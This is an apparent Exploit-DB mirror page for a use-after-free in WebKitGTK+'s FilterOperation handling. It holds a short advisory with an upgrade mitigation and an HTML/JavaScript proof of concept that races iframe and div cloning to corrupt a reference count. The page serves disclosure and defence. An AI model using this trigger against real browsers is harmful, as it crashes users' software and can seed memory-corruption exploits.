header-logo
Suggest Exploit
vendor:
WebKitGTK+
by:
N/A
8.8
CVSS
HIGH
UAF (Use-After-Free)
416
CWE
Product Name: WebKitGTK+
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2020

WebKitGTK+ FilterOperation UAF Vulnerability

The compositor thread in WebKitGTK+ might alter a FilterOperation object's reference count variable at the same time as the main thread. Then the reference count corruption might lead to a UAF condition. Reproduction case involves creating an iframe, cloning a style element, and creating a div element with a filter applied to it. The div element is then cloned and appended to the iframe's body multiple times. This can lead to a UAF condition.

Mitigation:

Upgrade to the latest version of WebKitGTK+.
Source

Exploit-DB raw data:

<!--
VULNERABILITY DETAILS
The compositor thread in WebKitGTK+ might alter a FilterOperation object's reference count variable at the same time as the main thread. Then the reference count corruption might lead to a UAF condition.


REPRODUCTION CASE
-->

<html>
<style>
@keyframes foo {
    0% { opacity: 0; }
    100% { opacity: 1; }
}

div {
  animation-name: foo;
  animation-duration: 1s;
  animation-iteration-count: infinite;
  filter: saturate(50%);
}
</style>
<body>
<script>
    frame = document.createElement("iframe");

    setInterval(_ => {
      frame.remove();
      document.body.appendChild(frame);

      doc = frame.contentDocument;
      doc.head.appendChild(document.querySelector("style").cloneNode(true));

      elt = document.createElement("div");
      elt.textContent = "foo";
      let elements = [];

      for (let i = 0, count = Math.random() * 50; i < count; ++i) {
        elements[i] = doc.body.appendChild(elt.cloneNode(true));
        elements[i].clientWidth;
      }
    }, Math.random() * 500);
</script>
</body>
</html>

<!--
VERSION
Reproduced on WebKitGTK+ build revision 240647.
This bug doesn't seem to affect WebKit on macOS/iOS.
-->

Navigation

Suggest Exploit

Services By CQR